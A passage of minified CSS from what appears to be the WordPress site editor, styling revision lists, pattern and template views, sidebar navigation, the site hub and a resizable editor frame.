.edit-site-global-styles-screen-revisions__revision-item:before{ background:#ddd; border:4px solid #0000; border-radius:50%; height:8px; left:17px; top:18px; transform:translate(-50%, -50%); width:8px; z-index:1; } .edit-site-global-styles-screen-revisions__revision-item[aria-selected=true]{ background:rgba(var(--wp-admin-theme-color--rgb), .04); border-radius:2px; color:var(--wp-admin-theme-color); outline:3px solid #0000; outline-offset:-2px; } .edit-site-global-styles-screen-revisions__revision-item[aria-selected=true] .edit-site-global-styles-screen-revisions__date{ color:var(--wp-admin-theme-color); } .edit-site-global-styles-screen-revisions__revision-item[aria-selected=true]:before{ background:var(--wp-admin-theme-color); } .edit-site-global-styles-screen-revisions__revision-item[aria-selected=true] .edit-site-global-styles-screen-revisions__applied-text,.edit-site-global-styles-screen-revisions__revision-item[aria-selected=true] .edit-site-global-styles-screen-revisions__changes>li,.edit-site-global-styles-screen-revisions__revision-item[aria-selected=true] .edit-site-global-styles-screen-revisions__meta{ color:#1e1e1e; } .edit-site-global-styles-screen-revisions__revision-item:after{ border:.5px solid #ddd; height:100%; left:16px; top:0; width:0; } .edit-site-global-styles-screen-revisions__revision-item:first-child:after{ top:18px; } .edit-site-global-styles-screen-revisions__revision-item:last-child:after{ height:18px; } .edit-site-global-styles-screen-revisions__revision-item-wrapper{ display:block; padding:12px 12px 4px 40px; } .edit-site-global-styles-screen-revisions__applied-text,.edit-site-global-styles-screen-revisions__apply-button.is-primary{ align-self:flex-start; margin:4px 12px 12px 40px; } .edit-site-global-styles-screen-revisions__applied-text,.edit-site-global-styles-screen-revisions__changes,.edit-site-global-styles-screen-revisions__meta{ color:#757575; font-size:12px; } .edit-site-global-styles-screen-revisions__description{ align-items:flex-start; display:flex; flex-direction:column; gap:8px; } .edit-site-global-styles-screen-revisions__description .edit-site-global-styles-screen-revisions__date{ font-size:12px; font-weight:600; text-transform:uppercase; } .edit-site-global-styles-screen-revisions__meta{ align-items:flex-start; display:flex; justify-content:start; margin-bottom:4px; text-align:left; width:100%; } .edit-site-global-styles-screen-revisions__meta img{ border-radius:100%; height:16px; margin-right:8px; width:16px; } .edit-site-global-styles-screen-revisions__loading{ margin:24px auto !important; } .edit-site-global-styles-screen-revisions__changes{ line-height:1.4; list-style:disc; margin-left:12px; text-align:left; } .edit-site-global-styles-screen-revisions__changes li{ margin-bottom:4px; } .edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination{ gap:2px; justify-content:space-between; } .edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .edit-site-pagination__total{ height:1px; left:-1000px; margin:-1px; overflow:hidden; position:absolute; } .edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .components-text{ font-size:12px; will-change:opacity; } .edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .components-button.is-tertiary{ color:#1e1e1e; } .edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .components-button.is-tertiary:disabled,.edit-site-global-styles-screen-revisions__pagination.edit-site-global-styles-screen-revisions__pagination .components-button.is-tertiary[aria-disabled=true]{ color:#949494; } .edit-site-global-styles-screen-revisions__footer{ background:#fff; border-top:1px solid #ddd; bottom:0; height:56px; min-width:100%; padding:12px; position:sticky; z-index:1; } .edit-site-global-styles-sidebar{ display:flex; flex-direction:column; min-height:100%; } .edit-site-global-styles-sidebar__panel{ flex:1; } .edit-site-global-styles-sidebar .edit-site-global-styles-sidebar__header-title{ margin:0; } .edit-site-global-styles-sidebar .edit-site-global-styles-sidebar__header-actions{ flex:1; } .edit-site-global-styles-sidebar .components-navigation__menu-title-heading{ font-size:15.6px; font-weight:500; } .edit-site-global-styles-sidebar .components-navigation__item>button span{ font-weight:500; } .edit-site-global-styles-sidebar .block-editor-panel-color-gradient-settings{ border:0; } .edit-site-global-styles-sidebar .single-column{ grid-column:span 1; } .edit-site-global-styles-sidebar .components-tools-panel .span-columns{ grid-column:1 / -1; } .edit-site-global-styles-sidebar__blocks-group{ border-top:1px solid #e0e0e0; padding-top:24px; } .edit-site-global-styles-sidebar__blocks-group-help{ padding:0 16px; } .edit-site-global-styles-color-palette-panel,.edit-site-global-styles-gradient-palette-panel{ padding:16px; } .edit-site-global-styles-sidebar hr{ margin:0; } .show-icon-labels .edit-site-global-styles-sidebar__header .components-button.has-icon{ width:auto; } .show-icon-labels .edit-site-global-styles-sidebar__header .components-button.has-icon svg{ display:none; } .show-icon-labels .edit-site-global-styles-sidebar__header .components-button.has-icon:after{ content:attr(aria-label); font-size:12px; } .edit-site-patterns__delete-modal{ width:384px; } .page-patterns-preview-field{ align-items:center; border-radius:4px; display:flex; flex-direction:column; height:100%; justify-content:center; } .dataviews-view-grid .page-patterns-preview-field .block-editor-block-preview__container{ height:100%; } .dataviews-view-table .page-patterns-preview-field{ flex-grow:0; text-wrap:balance; text-wrap:pretty; width:96px; } .edit-site-patterns__pattern-icon{ fill:var(--wp-block-synced-color); flex-shrink:0; } .edit-site-patterns__section-header{ border-bottom:1px solid #f0f0f0; flex-shrink:0; min-height:40px; padding:16px 48px; position:sticky; top:0; z-index:2; } @media not (prefers-reduced-motion){ .edit-site-patterns__section-header{ transition:padding .1s ease-out; } } .edit-site-patterns__section-header .edit-site-patterns__title{ min-height:40px; } .edit-site-patterns__section-header .edit-site-patterns__title .components-heading{ flex-basis:0; flex-grow:1; white-space:nowrap; } .edit-site-patterns__section-header .edit-site-patterns__sub-title{ margin-bottom:8px; } .edit-site-patterns__section-header .screen-reader-shortcut:focus{ top:0; } .edit-site-page-patterns-dataviews .dataviews-view-grid__badge-fields .dataviews-view-grid__field-value:has(.edit-site-patterns__field-sync-status-fully){ background:rgba(var(--wp-block-synced-color--rgb), .04); color:var(--wp-block-synced-color); } .dataviews-action-modal__duplicate-pattern [role=dialog]>[role=document]{ width:350px; } .dataviews-action-modal__duplicate-pattern .patterns-menu-items__convert-modal-categories{ position:relative; } .dataviews-action-modal__duplicate-pattern .components-form-token-field__suggestions-list:not(:empty){ background-color:#fff; border:1px solid var(--wp-admin-theme-color); border-bottom-left-radius:2px; border-bottom-right-radius:2px; box-shadow:0 0 .5px .5px var(--wp-admin-theme-color); box-sizing:border-box; left:-1px; max-height:96px; min-width:auto; position:absolute; width:calc(100% + 2px); z-index:1; } @media (min-width:600px){ .dataviews-action-modal__duplicate-template-part .components-modal__frame{ max-width:500px; } } @container (max-width: 430px){ .edit-site-page-patterns-dataviews .edit-site-patterns__section-header{ padding-left:24px; padding-right:24px; } } .page-templates-preview-field{ align-items:center; border-radius:4px; display:flex; flex-direction:column; height:100%; justify-content:center; width:100%; } .dataviews-view-list .page-templates-preview-field .block-editor-block-preview__container{ height:120px; } .dataviews-view-grid .page-templates-preview-field .block-editor-block-preview__container{ height:100%; } .dataviews-view-table .page-templates-preview-field{ max-height:160px; position:relative; text-wrap:balance; text-wrap:pretty; width:120px; } .edit-site-page-templates .dataviews-pagination{ z-index:2; } .page-templates-author-field__avatar{ align-items:center; display:flex; flex-shrink:0; height:24px; justify-content:left; overflow:hidden; width:24px; } .page-templates-author-field__avatar img{ border-radius:100%; height:16px; object-fit:cover; opacity:0; width:16px; } @media not (prefers-reduced-motion){ .page-templates-author-field__avatar img{ transition:opacity .1s linear; } } .page-templates-author-field__avatar.is-loaded img{ opacity:1; } .page-templates-author-field__icon{ display:flex; flex-shrink:0; height:24px; width:24px; } .page-templates-author-field__icon svg{ margin-left:-4px; fill:currentColor; } .page-templates-author-field__name{ overflow:hidden; text-overflow:ellipsis; } .edit-site-list__rename-modal{ z-index:1000001; } @media (min-width:782px){ .edit-site-list__rename-modal .components-base-control{ width:320px; } } .edit-site-editor__editor-interface{ opacity:1; } @media not (prefers-reduced-motion){ .edit-site-editor__editor-interface{ transition:opacity .1s ease-out; } } .edit-site-editor__editor-interface.is-loading{ opacity:0; } .edit-site-editor__toggle-save-panel{ background-color:#fff; border:1px dotted #ddd; box-sizing:border-box; display:flex; justify-content:center; padding:24px; width:280px; } .edit-site-editor__view-mode-toggle{ view-transition-name:toggle; height:64px; left:0; top:0; width:64px; z-index:100; } .edit-site-editor__view-mode-toggle .components-button{ align-items:center; border-radius:0; color:#fff; display:flex; height:100%; justify-content:center; overflow:hidden; padding:0; width:100%; } .edit-site-editor__view-mode-toggle .components-button:active,.edit-site-editor__view-mode-toggle .components-button:hover{ color:#fff; } .edit-site-editor__view-mode-toggle .components-button:focus{ box-shadow:none; } .edit-site-editor__view-mode-toggle .edit-site-editor__view-mode-toggle-icon img,.edit-site-editor__view-mode-toggle .edit-site-editor__view-mode-toggle-icon svg{ background:#1e1e1e; display:block; } .edit-site-editor__back-icon{ align-items:center; background-color:#ccc; display:flex; height:64px; justify-content:center; left:0; pointer-events:none; position:absolute; top:0; width:64px; } .edit-site-editor__back-icon svg{ fill:currentColor; } .edit-site-editor__back-icon.has-site-icon{ backdrop-filter:saturate(180%) blur(15px); background-color:#fff9; } .edit-site-welcome-guide{ width:312px; } .edit-site-welcome-guide.guide-editor .edit-site-welcome-guide__image,.edit-site-welcome-guide.guide-styles .edit-site-welcome-guide__image{ background:#00a0d2; } .edit-site-welcome-guide.guide-page .edit-site-welcome-guide__video{ border-right:16px solid #3858e9; border-top:16px solid #3858e9; } .edit-site-welcome-guide.guide-template .edit-site-welcome-guide__video{ border-left:16px solid #3858e9; border-top:16px solid #3858e9; } .edit-site-welcome-guide__image{ margin:0 0 16px; } .edit-site-welcome-guide__image>img{ display:block; max-width:100%; object-fit:cover; } .edit-site-welcome-guide__heading{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:24px; line-height:1.4; margin:16px 0; padding:0 32px; } .edit-site-welcome-guide__text{ font-size:13px; line-height:1.4; margin:0 0 16px; padding:0 32px; } .edit-site-welcome-guide__text img{ vertical-align:bottom; } .edit-site-welcome-guide__inserter-icon{ margin:0 4px; vertical-align:text-top; } .edit-site-layout{ color:#ccc; display:flex; flex-direction:column; height:100%; } .edit-site-layout,.edit-site-layout:not(.is-full-canvas) .editor-visual-editor{ background:#1e1e1e; } .edit-site-layout__content{ display:flex; flex-grow:1; height:100%; } .edit-site-layout__sidebar-region{ flex-shrink:0; width:100vw; z-index:1; } @media (min-width:782px){ .edit-site-layout__sidebar-region{ width:300px; } } .edit-site-layout.is-full-canvas .edit-site-layout__sidebar-region{ height:100vh; left:0; position:fixed !important; top:0; } .edit-site-layout__sidebar-region .edit-site-layout__sidebar{ display:flex; flex-direction:column; height:100%; } .edit-site-layout__sidebar-region .resizable-editor__drag-handle{ right:0; } .edit-site-layout__main{ display:flex; flex-direction:column; flex-grow:1; overflow:hidden; } .edit-site-layout__mobile{ display:flex; flex-direction:column; position:relative; width:100%; z-index:2; } .edit-site-layout__mobile .edit-site-sidebar__screen-wrapper{ padding:0; } .edit-site-layout__mobile .edit-site-sidebar-navigation-screen__main{ padding:0 12px; } .edit-site-layout__canvas-container{ flex-grow:1; overflow:visible; position:relative; z-index:2; } .edit-site-layout__canvas-container.is-resizing:after{ bottom:0; content:""; left:0; position:absolute; right:0; top:0; z-index:100; } .edit-site-layout__canvas{ align-items:center; bottom:0; display:flex; justify-content:center; left:0; position:absolute; top:0; width:100%; } .edit-site-layout__canvas.is-right-aligned{ justify-content:flex-end; } .edit-site-layout__canvas .edit-site-resizable-frame__inner{ color:#1e1e1e; } @media (min-width:782px){ .edit-site-layout__canvas{ bottom:16px; top:16px; width:calc(100% - 16px); } .edit-site-layout__canvas .edit-site-resizable-frame__inner-content{ box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003; overflow:hidden; } } @media (min-width:782px) and (not (prefers-reduced-motion)){ .edit-site-layout__canvas .edit-site-resizable-frame__inner-content{ transition:border-radius,box-shadow .4s; } } @media (min-width:782px){ .edit-site-layout:not(.is-full-canvas) .edit-site-layout__canvas .edit-site-resizable-frame__inner-content{ border-radius:8px; } .edit-site-layout__canvas .edit-site-resizable-frame__inner-content:hover{ box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005; } } .edit-site-layout.is-full-canvas .edit-site-layout__canvas{ bottom:0; top:0; width:100%; } .edit-site-layout__canvas .interface-interface-skeleton,.edit-site-layout__mobile .interface-interface-skeleton,.edit-site-template-pages-preview .interface-interface-skeleton{ min-height:100% !important; position:relative !important; } .edit-site-template-pages-preview{ height:100%; } html.canvas-mode-edit-transition::view-transition-group(toggle){ animation-delay:255ms; } @media (prefers-reduced-motion){ ::view-transition-group(*),::view-transition-new(*),::view-transition-old(*){ animation:none !important; } } .edit-site-layout.is-full-canvas .edit-site-layout__sidebar-region .edit-site-layout__view-mode-toggle{ display:none; } .edit-site-layout__view-mode-toggle.components-button{ view-transition-name:toggle; align-items:center; background:#1e1e1e; border-radius:0; color:#fff; display:flex; height:64px; justify-content:center; overflow:hidden; padding:0; position:relative; width:64px; } .edit-site-layout__view-mode-toggle.components-button:active,.edit-site-layout__view-mode-toggle.components-button:hover{ color:#fff; } .edit-site-layout__view-mode-toggle.components-button:focus,.edit-site-layout__view-mode-toggle.components-button:focus-visible{ box-shadow:0 0 0 3px #1e1e1e, 0 0 0 6px var(--wp-admin-theme-color); outline:4px solid #0000; outline-offset:4px; } .edit-site-layout__view-mode-toggle.components-button:before{ border-radius:4px; bottom:9px; box-shadow:none; content:""; display:block; left:17px; position:absolute; right:9px; top:9px; } @media not (prefers-reduced-motion){ .edit-site-layout__view-mode-toggle.components-button:before{ transition:box-shadow .1s ease; } } .edit-site-layout__view-mode-toggle.components-button .edit-site-layout__view-mode-toggle-icon{ align-items:center; display:flex; height:64px; justify-content:center; width:64px; } .edit-site-layout__actions{ background:#fff; bottom:auto; color:#1e1e1e; left:auto; position:fixed !important; right:0; top:-9999em; width:280px; z-index:100000; } .edit-site-layout__actions:focus,.edit-site-layout__actions:focus-within{ bottom:0; top:auto; } .edit-site-layout__actions.is-entity-save-view-open:focus,.edit-site-layout__actions.is-entity-save-view-open:focus-within{ top:0; } @media (min-width:782px){ .edit-site-layout__actions{ border-left:1px solid #ddd; } } .edit-site-layout__area{ box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003; flex-grow:1; margin:0; overflow:hidden; } @media (min-width:782px){ .edit-site-layout__area{ border-radius:8px; margin:16px 16px 16px 0; } } .edit-site .components-editor-notices__snackbar{ bottom:16px; padding-left:16px; padding-right:16px; position:fixed; right:0; } .edit-site-save-hub{ border-top:1px solid #2f2f2f; color:#949494; flex-shrink:0; margin:0; padding:16px; } .edit-site-save-hub__button{ color:inherit; justify-content:center; width:100%; } .edit-site-save-hub__button[aria-disabled=true]{ opacity:1; } .edit-site-save-hub__button[aria-disabled=true]:hover{ color:inherit; } .edit-site-save-hub__button:not(.is-primary).is-busy,.edit-site-save-hub__button:not(.is-primary).is-busy[aria-disabled=true]:hover{ color:#1e1e1e; } @media (min-width:600px){ .edit-site-save-panel__modal{ width:600px; } } .edit-site-sidebar__content{ contain:content; flex-grow:1; overflow-x:hidden; overflow-y:auto; } @keyframes local--slide-from-right{ 0%{ opacity:0; transform:translateX(50px); } to{ opacity:1; transform:none; } } @keyframes local--slide-from-left{ 0%{ opacity:0; transform:translateX(-50px); } to{ opacity:1; transform:none; } } .edit-site-sidebar__screen-wrapper{ overflow-x:auto; } .edit-site-sidebar__screen-wrapper::-webkit-scrollbar{ height:12px; width:12px; } .edit-site-sidebar__screen-wrapper::-webkit-scrollbar-track{ background-color:initial; } .edit-site-sidebar__screen-wrapper::-webkit-scrollbar-thumb{ background-clip:padding-box; background-color:initial; border:3px solid #0000; border-radius:8px; } .edit-site-sidebar__screen-wrapper:focus-within::-webkit-scrollbar-thumb,.edit-site-sidebar__screen-wrapper:focus::-webkit-scrollbar-thumb,.edit-site-sidebar__screen-wrapper:hover::-webkit-scrollbar-thumb{ background-color:#757575; } .edit-site-sidebar__screen-wrapper{ scrollbar-color:#0000 #0000; scrollbar-gutter:stable both-edges; scrollbar-width:thin; } .edit-site-sidebar__screen-wrapper:focus,.edit-site-sidebar__screen-wrapper:focus-within,.edit-site-sidebar__screen-wrapper:hover{ scrollbar-color:#757575 #0000; } .edit-site-sidebar__screen-wrapper{ will-change:transform; } @media (hover:none){ .edit-site-sidebar__screen-wrapper{ scrollbar-color:#757575 #0000; } } .edit-site-sidebar__screen-wrapper{ animation-duration:.14s; animation-timing-function:ease-in-out; display:flex; flex-direction:column; height:100%; max-height:100%; padding:0 12px; scrollbar-gutter:stable; will-change:transform, opacity; } @media (prefers-reduced-motion:reduce){ .edit-site-sidebar__screen-wrapper{ animation-duration:0s; } } .edit-site-sidebar__screen-wrapper.slide-from-left{ animation-name:local--slide-from-left; } .edit-site-sidebar__screen-wrapper.slide-from-right{ animation-name:local--slide-from-right; } .edit-site-sidebar-button{ color:#e0e0e0; flex-shrink:0; } .edit-site-sidebar-button:focus:not(:disabled){ box-shadow:none; outline:none; } .edit-site-sidebar-button:focus-visible:not(:disabled){ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:3px solid #0000; } .edit-site-sidebar-button:focus,.edit-site-sidebar-button:focus-visible,.edit-site-sidebar-button:hover:not(:disabled,[aria-disabled=true]),.edit-site-sidebar-button:not(:disabled,[aria-disabled=true]):active,.edit-site-sidebar-button[aria-expanded=true]{ color:#f0f0f0; } .edit-site-sidebar-navigation-item.components-item{ border:none; color:#949494; min-height:40px; padding:8px 6px 8px 16px; } .edit-site-sidebar-navigation-item.components-item:focus,.edit-site-sidebar-navigation-item.components-item:hover,.edit-site-sidebar-navigation-item.components-item[aria-current=true]{ color:#e0e0e0; } .edit-site-sidebar-navigation-item.components-item:focus .edit-site-sidebar-navigation-item__drilldown-indicator,.edit-site-sidebar-navigation-item.components-item:hover .edit-site-sidebar-navigation-item__drilldown-indicator,.edit-site-sidebar-navigation-item.components-item[aria-current=true] .edit-site-sidebar-navigation-item__drilldown-indicator{ fill:#e0e0e0; } .edit-site-sidebar-navigation-item.components-item[aria-current=true]{ background:#2f2f2f; color:#fff; font-weight:500; } .edit-site-sidebar-navigation-item.components-item:focus-visible{ transform:translateZ(0); } .edit-site-sidebar-navigation-item.components-item .edit-site-sidebar-navigation-item__drilldown-indicator{ fill:#949494; } .edit-site-sidebar-navigation-item.components-item.with-suffix{ padding-right:16px; } .edit-site-sidebar-navigation-screen__content .block-editor-list-view-block-select-button{ cursor:grab; padding:8px 8px 8px 0; } .edit-site-sidebar-navigation-screen{ display:flex; flex-direction:column; overflow-x:unset !important; position:relative; } .edit-site-sidebar-navigation-screen__main{ flex-grow:1; margin-bottom:16px; } .edit-site-sidebar-navigation-screen__main.has-footer{ margin-bottom:0; } .edit-site-sidebar-navigation-screen__content{ padding:0 16px; } .edit-site-sidebar-navigation-screen__content .components-text{ color:#ccc; } .edit-site-sidebar-navigation-screen__content .components-heading{ margin-bottom:8px; } .edit-site-sidebar-navigation-screen__title-icon{ background:#1e1e1e; margin-bottom:8px; padding-bottom:8px; padding-top:48px; position:sticky; top:0; z-index:1; } .edit-site-sidebar-navigation-screen__title{ flex-grow:1; overflow-wrap:break-word; } .edit-site-sidebar-navigation-screen__title.edit-site-sidebar-navigation-screen__title,.edit-site-sidebar-navigation-screen__title.edit-site-sidebar-navigation-screen__title .edit-site-sidebar-navigation-screen__title{ line-height:32px; } .edit-site-sidebar-navigation-screen__actions{ display:flex; flex-shrink:0; } @media (min-width:782px){ .edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variation-container{ max-width:292px; } } .edit-site-global-styles-variation-title{ color:#ddd; font-size:11px; font-weight:500; text-transform:uppercase; } .edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview{ outline-color:#ffffff0d; } .edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variations_item:not(.is-active):hover .edit-site-global-styles-variations_item-preview{ outline-color:#ffffff26; } .edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variations_item.is-active .edit-site-global-styles-variations_item-preview{ outline-color:#fff; } .edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variations_item:focus-visible .edit-site-global-styles-variations_item-preview{ outline-color:var(--wp-admin-theme-color); } .edit-site-sidebar-navigation-screen__footer{ background-color:#1e1e1e; border-top:1px solid #2f2f2f; bottom:0; gap:0; margin:16px 0 0; padding:8px 16px; position:sticky; } .edit-site-sidebar-navigation-screen__footer .edit-site-sidebar-navigation-screen-details-footer{ margin-left:-16px; margin-right:-16px; } .edit-site-sidebar-navigation-screen__input-control{ width:100%; } .edit-site-sidebar-navigation-screen__input-control .components-input-control__container{ background:#2f2f2f; } .edit-site-sidebar-navigation-screen__input-control .components-input-control__container .components-button{ color:#e0e0e0 !important; } .edit-site-sidebar-navigation-screen__input-control .components-input-control__input{ background:#2f2f2f !important; color:#e0e0e0 !important; } .edit-site-sidebar-navigation-screen__input-control .components-input-control__backdrop{ border:4px !important; } .edit-site-sidebar-navigation-screen__input-control .components-base-control__help{ color:#949494; } .edit-site-sidebar-navigation-screen-details-footer div.edit-site-sidebar-navigation-item.components-item:focus,.edit-site-sidebar-navigation-screen-details-footer div.edit-site-sidebar-navigation-item.components-item:hover,.edit-site-sidebar-navigation-screen-details-footer div.edit-site-sidebar-navigation-item.components-item[aria-current]{ background:none; } .sidebar-navigation__more-menu .components-button{ color:#e0e0e0; } .sidebar-navigation__more-menu .components-button:focus,.sidebar-navigation__more-menu .components-button:hover,.sidebar-navigation__more-menu .components-button[aria-current]{ color:#f0f0f0; } .edit-site-sidebar-navigation-screen-patterns__group{ margin-bottom:24px; margin-left:-16px; margin-right:-16px; } .edit-site-sidebar-navigation-screen-patterns__group:last-of-type{ border-bottom:0; margin-bottom:0; padding-bottom:0; } .edit-site-sidebar-navigation-screen-patterns__group-header{ margin-top:16px; } .edit-site-sidebar-navigation-screen-patterns__group-header p{ color:#949494; } .edit-site-sidebar-navigation-screen-patterns__group-header h2{ font-size:11px; font-weight:500; text-transform:uppercase; } .edit-site-sidebar-navigation-screen-patterns__divider{ border-top:1px solid #2f2f2f; margin:16px 0; } .edit-site-sidebar-navigation-screen__description{ margin:0 0 32px; } .edit-site-sidebar-navigation-screen-navigation-menus{ margin-left:-16px; margin-right:-16px; } .edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-leaf .block-editor-list-view-block-contents{ white-space:normal; } .edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__title{ margin-top:3px; } .edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__menu-cell{ padding-right:0; } .edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block-select-button{ color:#949494; } .edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block-select-button:focus,.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block-select-button:hover,.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block-select-button[aria-current]{ color:#fff; } .edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__menu{ color:#949494; } .edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__menu:focus,.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__menu:hover{ color:#fff; } .edit-site-sidebar-navigation-screen-navigation-menus__loading.components-spinner{ display:block; margin-left:auto; margin-right:auto; } .edit-site-sidebar-navigation-screen-navigation-menus__helper-block-editor{ display:none; } .edit-site-sidebar-dataviews,.edit-site-sidebar-navigation-screen-main,.edit-site-sidebar-navigation-screen-templates-browse{ margin-left:-16px; margin-right:-16px; } .edit-site-sidebar-dataviews-dataview-item{ border-radius:2px; } .edit-site-sidebar-dataviews-dataview-item:focus,.edit-site-sidebar-dataviews-dataview-item:hover,.edit-site-sidebar-dataviews-dataview-item[aria-current]{ color:#e0e0e0; } .edit-site-sidebar-dataviews-dataview-item.is-selected{ background:#2f2f2f; color:#fff; font-weight:500; } .edit-site-site-hub{ align-items:center; display:flex; gap:8px; height:64px; justify-content:space-between; margin-right:12px; } .edit-site-site-hub__actions{ flex-shrink:0; } .edit-site-site-hub__view-mode-toggle-container{ flex-shrink:0; height:64px; width:64px; } .edit-site-site-hub__view-mode-toggle-container.has-transparent-background .edit-site-layout__view-mode-toggle-icon{ background:#0000; } .edit-site-site-hub__title .components-button{ color:#e0e0e0; display:block; flex-grow:1; font-size:15px; font-weight:500; margin-left:-4px; overflow:hidden; padding-right:16px; position:relative; text-decoration:none; text-overflow:ellipsis; white-space:nowrap; } .edit-site-site-hub__title .components-button:active,.edit-site-site-hub__title .components-button:focus,.edit-site-site-hub__title .components-button:hover{ color:#e0e0e0; } .edit-site-site-hub__title .components-button:focus{ box-shadow:none; outline:none; } .edit-site-site-hub__title .components-button:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) #1e1e1e, 0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color); outline:2px solid #0000; outline-offset:2px; } .edit-site-site-hub__title .components-button:after{ content:"↗"; font-weight:400; opacity:0; position:absolute; right:0; } @media not (prefers-reduced-motion){ .edit-site-site-hub__title .components-button:after{ transition:opacity .1s linear; } } .edit-site-site-hub__title .components-button:active:after,.edit-site-site-hub__title .components-button:focus:after,.edit-site-site-hub__title .components-button:hover:after{ opacity:1; } .edit-site-site-hub_toggle-command-center{ color:#e0e0e0; } .edit-site-site-hub_toggle-command-center:active svg,.edit-site-site-hub_toggle-command-center:hover svg{ fill:#f0f0f0; } .edit-site-site-icon__icon{ fill:currentColor; height:100%; width:100%; } .edit-site-layout.is-full-canvas .edit-site-site-icon__icon{ padding:12px; } .edit-site-site-icon__image{ aspect-ratio:1/1; background:#333; height:100%; object-fit:cover; width:100%; } .edit-site-layout.is-full-canvas .edit-site-site-icon__image{ border-radius:0; } .edit-site-editor__view-mode-toggle button:focus{ position:relative; } .edit-site-editor__view-mode-toggle button:focus:before{ bottom:0; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color), inset 0 0 0 calc(1px + var(--wp-admin-border-width-focus)) #fff; content:""; display:block; left:0; position:absolute; right:0; top:0; z-index:1; } .edit-site-style-book{ height:100%; } .edit-site-style-book.is-button{ border-radius:8px; } .edit-site-style-book{ align-items:stretch; display:flex; flex-direction:column; } .edit-site-style-book__iframe{ display:block; height:100%; width:100%; } .edit-site-style-book__iframe.is-button{ border-radius:8px; } .edit-site-style-book__iframe.is-focused{ outline:calc(var(--wp-admin-border-width-focus)*2) solid var(--wp-admin-theme-color); outline-offset:calc(var(--wp-admin-border-width-focus)*-2); } .edit-site-style-book__tablist-container{ background:#fff; display:flex; flex:none; padding-right:56px; width:100%; } .edit-site-style-book__tabpanel{ flex:1 0 auto; overflow:auto; } .edit-site-editor-canvas-container{ background-color:var(--wp-editor-canvas-background); height:100%; } .edit-site-editor-canvas-container iframe{ display:block; height:100%; width:100%; } .edit-site-layout.is-full-canvas .edit-site-editor-canvas-container{ padding:24px 24px 0; } .edit-site-editor-canvas-container__section{ background:#fff; border-radius:8px; bottom:0; left:0; overflow:hidden; position:absolute; right:0; top:0; } @media not (prefers-reduced-motion){ .edit-site-editor-canvas-container__section{ transition:all .3s; } } .edit-site-editor-canvas-container__close-button{ background:#fff; position:absolute; right:8px; top:8px; z-index:2; } .edit-site-post-edit{ padding:24px; } .dataforms-layouts-panel__field-dropdown .fields-controls__password{ border-top:1px solid #e0e0e0; padding-top:16px; } .edit-site-post-list__featured-image{ height:100%; object-fit:cover; width:100%; } .edit-site-post-list__featured-image-wrapper{ border-radius:4px; height:100%; width:100%; } .edit-site-post-list__featured-image-wrapper.is-layout-table .edit-site-post-list__featured-image-button,.edit-site-post-list__featured-image-wrapper.is-layout-table:not(:has(.edit-site-post-list__featured-image-button)){ background-color:#f0f0f0; border-radius:4px; display:block; flex-grow:0 !important; height:32px; overflow:hidden; position:relative; width:32px; } .edit-site-post-list__featured-image-wrapper.is-layout-table .edit-site-post-list__featured-image-button:after,.edit-site-post-list__featured-image-wrapper.is-layout-table:not(:has(.edit-site-post-list__featured-image-button)):after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; left:0; position:absolute; top:0; width:100%; } .edit-site-post-list__featured-image-button{ background-color:unset; border:none; border-radius:4px; box-shadow:none; box-sizing:border-box; cursor:pointer; height:100%; overflow:hidden; padding:0; width:100%; } .edit-site-post-list__featured-image-button:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .dataviews-view-grid__card.is-selected .edit-site-post-list__featured-image-button:after{ background:rgba(var(--wp-admin-theme-color--rgb), .04); box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .edit-site-post-list__status-icon{ height:24px; width:24px; } .edit-site-post-list__status-icon svg{ fill:currentColor; margin-left:-4px; } .edit-site-resizable-frame__inner{ position:relative; } body:has(.edit-site-resizable-frame__inner.is-resizing){ cursor:col-resize; user-select:none; -webkit-user-select:none; } .edit-site-resizable-frame__inner.is-resizing:before{ content:""; inset:0; position:absolute; z-index:1; } .edit-site-resizable-frame__inner-content{ inset:0; position:absolute; z-index:0; } .edit-site-resizable-frame__handle{ align-items:center; background-color:#75757566; border:0; border-radius:4px; cursor:col-resize; display:flex; height:64px; justify-content:flex-end; padding:0; position:absolute; top:calc(50% - 32px); width:4px; z-index:100; } .edit-site-resizable-frame__handle:before{ content:""; height:100%; left:100%; position:absolute; width:32px; } .edit-site-resizable-frame__handle:after{ 